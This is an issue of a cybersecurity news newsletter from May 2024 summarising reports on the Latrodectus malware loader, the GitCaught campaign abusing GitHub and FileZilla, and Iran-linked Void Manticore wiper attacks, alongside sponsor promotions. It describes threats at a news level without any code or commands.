May 21 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter thatβs rolling like thunder, deep cyber-under π
Todayβs hottest cybersecurity news stories:
π§ Youβre as cold as IcedID, you're willing to Latrodectus πΎ
πΈ Malware cocktail delivered via GitHub and FileZilla π¦
πΊοΈ Albania, Israel targeted by MOIS-linked hackers baby π¨βπ»
Cybersecurity researchers have observed a surge in email phishing campaigns since early March 2024, delivering a nascent malware loader named Latrodectus. This malware is believed to be the successor to the infamous IcedID malware.
Infection Chain ππ·οΈ
The campaigns typically use oversized JavaScript files that exploit WMI to invoke msiexec.exe, installing a remotely hosted MSI file from a WEBDAV share. Latrodectus, designed to deploy additional payloads like QakBot, DarkGate, and PikaBot, allows threat actors to conduct various post-exploitation activities.
Advanced Features π οΈπ
Latrodectus boasts several sophisticated features:
Enumeration and execution capabilities
Self-delete technique for erasing running files
Masquerades as legitimate software libraries
Obfuscates source code and performs anti-analysis checks to evade debugging and sandbox environments
Sets up persistence on Windows hosts using a scheduled task
Communicates with a C2 server over HTTPS for commands such as collecting system information, updating, restarting, and executing files
New Commands ππ
Recent updates include commands to enumerate files in the desktop directory and retrieve the entire running process ancestry from infected machines. Although designed to download and execute IcedID, this behaviour hasn't been detected in the wild.
Potential Successor to IcedID π€π
Researchers hypothesise that Latrodectus might be developed as a replacement for IcedID, given their development connections and similar functionalities.
Other Phishing Campaigns π£πΌ
In addition to Latrodectus, other notable phishing campaigns have been observed:
DarkGate Malware: Using QuickBooks invoice-themed emails, phishing campaigns lead users to a malicious JAR file, executing a PowerShell script to download and launch DarkGate via an AutoIT script.
Phishing-as-a-Service (PhaaS): An updated platform called Tycoon targets Microsoft 365 and Gmail session cookies, bypassing MFA protections with enhanced detection evasion techniques.
D3F@ck Loader: Propagated through Google ads impersonating Calendly and Rufus, this loader drops Raccoon Stealer and DanaBot. It illustrates the evolving MaaS landscape, utilizing Extended Validation certificates to bypass trusted security measures.
Emerging Threats π΅οΈββοΈπ
New stealer malware families like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer are also on the rise. The Remcos RAT has been spotted using a PrivateLoader module to enhance its capabilities, employing VB scripts, altering the registry, and setting up services to remain undetected.
Conclusion ππ«
The spike in Latrodectus campaigns and other phishing threats underscores the ever-evolving landscape of cyber threats. Organisations must stay vigilant, employ robust security measures, and educate users on phishing risks to mitigate these sophisticated attacks.
A sophisticated campaign has been observed leveraging legitimate services like GitHub and FileZilla to distribute a variety of stealer malware and banking trojans, including Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo. The malware is disguised as credible software such as 1Password, Bartender 5, and Pixelmator Pro.
Broad Targeting Strategy ππ»
Recorded Future's Insikt Group, tracking the activity under the moniker GitCaught, notes that the presence of multiple malware variants indicates a broad cross-platform targeting strategy. The use of overlapping C2 infrastructure suggests a centralised command setup, enhancing the efficiency of the attacks.
Attack Chains ππ
Attackers use fake profiles and repositories on GitHub to host counterfeit versions of popular software. These malicious files are embedded within various domains and distributed via malvertising and SEO poisoning campaigns.
Malware Management ποΈπ
The threat actors, suspected to be Russian-speaking from the Commonwealth of Independent States (CIS), also utilise FileZilla servers for managing and delivering malware. Analysis reveals that the campaign, active since at least August 2023, aims to deliver malware such as RedLine, Lumma, Raccoon, Vidar, Rhadamanthys, DanaBot, and DarkComet RAT.
Rhadamanthys Pathway πͺπ£
Victims who visit fake application websites are redirected to payloads hosted on Bitbucket and Dropbox, indicating a wider abuse of legitimate services.
Ongoing Threats β οΈπ
Microsoft's Threat Intelligence team has highlighted the ongoing threat of the macOS backdoor codenamed Activator. Distributed via disk image files impersonating cracked software, Activator steals data from Exodus and Bitcoin-Qt wallet applications. It prompts users for elevated privileges, disables macOS Gatekeeper and Notification Center, and deploys malicious Python scripts for persistence.
Key Points π
Campaign Name: GitCaught
Malware Variants: Atomic (AMOS), Vidar, Lumma (LummaC2), Octo, RedLine, Raccoon, Rhadamanthys, DanaBot, DarkComet RAT
Distribution Methods: Fake GitHub profiles, malvertising, SEO poisoning, Bitbucket, Dropbox
Target Platforms: Android, macOS, Windows
Threat Actors: Suspected Russian-speaking from CIS
Conclusion ππ«
This campaign underscores the growing trend of cybercriminals misusing legitimate services to orchestrate attacks. Organisations and individuals must remain vigilant, employing robust cybersecurity measures to protect against these sophisticated threats.
Stay ahead of the curve with Presspool.ai! π Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." π€π‘ Thatβs us, alright! π€΅ How about you? Visionary AI executive, much? π
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business π€π©βπ»π
Rest assured, the process is very straightforward.
You simply:
π Sign Up & Create Campaign
π Define your audience, budget, and message to captivate your audience.
π Launch your campaign, as Presspoolβs AI matches it with ideal newsletter audiences for optimal reach and conversions. π―
π΅οΈ Finally, you leverage real-time analytics to track performance and refine future strategies. π Elevate your marketing game and stay informed with Presspool.ai! π Simples! π¦¦
Presspool.aiΒ π°ππ€ may just have what you need to succeed. And if the product isnβt for you, the newsletter alone is a gamechanger. And we know newsletters π
Actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed to destructive wiping attacks targeting Albania and Israel. The campaigns are conducted under the personas Homeland Justice and Karma, respectively.
Threat Group βοΈπ―
Cybersecurity firm Check Point tracks this activity under the name Void Manticore, also known as Storm-0842 by Microsoft. The group shows significant overlap with another Iranian group, Scarred Manticore (aka Storm-0861).
Attack Patterns ππ₯
Void Manticore is known for:
Albania (since July 2022): Homeland Justice campaigns utilising bespoke wiper malware like Cl Wiper and No-Justice (LowEraser).
Israel (post-October 2023): Following the Israel-Hamas war, targeting Windows and Linux systems with wiper malware called BiBi, attributed to the pro-Hamas hacktivist group Karma.
Tactics and Techniques π οΈπ
The attack chains are straightforward, leveraging:
Publicly available tools
Remote Desktop Protocol (RDP)
Server Message Block (SMB)
File Transfer Protocol (FTP)
Initial access often exploits known vulnerabilities in internet-facing applications, such as CVE-2019-0604. Successful breaches are followed by the deployment of web shells, including Karma Shell, which masquerades as an error page while providing various malicious capabilities.
Collaboration Between Threat Groups π€π
Void Manticore appears to use access previously obtained by Scarred Manticore for its operations, suggesting a systematic handoff of targets. Microsoftβs investigations into attacks on
Albanian governments in 2022 indicated cooperation among multiple Iranian actors:
Storm-0861: Initial access and data exfiltration
Storm-0842: Ransomware and wiper malware deployment
Storm-0166: Further data exfiltration
Storm-0133: Probing victim infrastructure
Storm-0861 is linked to APT34 (Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, OilRig), known for wiper malware like Shamoon and ZeroCleare.
Check Pointβs Insights π§ π
Check Point highlights that:
Techniques overlap in attacks against Israel and Albania, indicating routine coordination.
Void Manticoreβs dual approach combines psychological warfare with data destruction, amplifying the impact on targeted organisations.
This ongoing cooperation and strategic coordination between Iranian cyber actors underscore the sophisticated nature of these campaigns.
ποΈ Extra, Extra! Read all about it! ποΈ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
π‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday π
π΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for π
πΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πΎ
Let us know what you think.
So long and thanks for reading all the phish!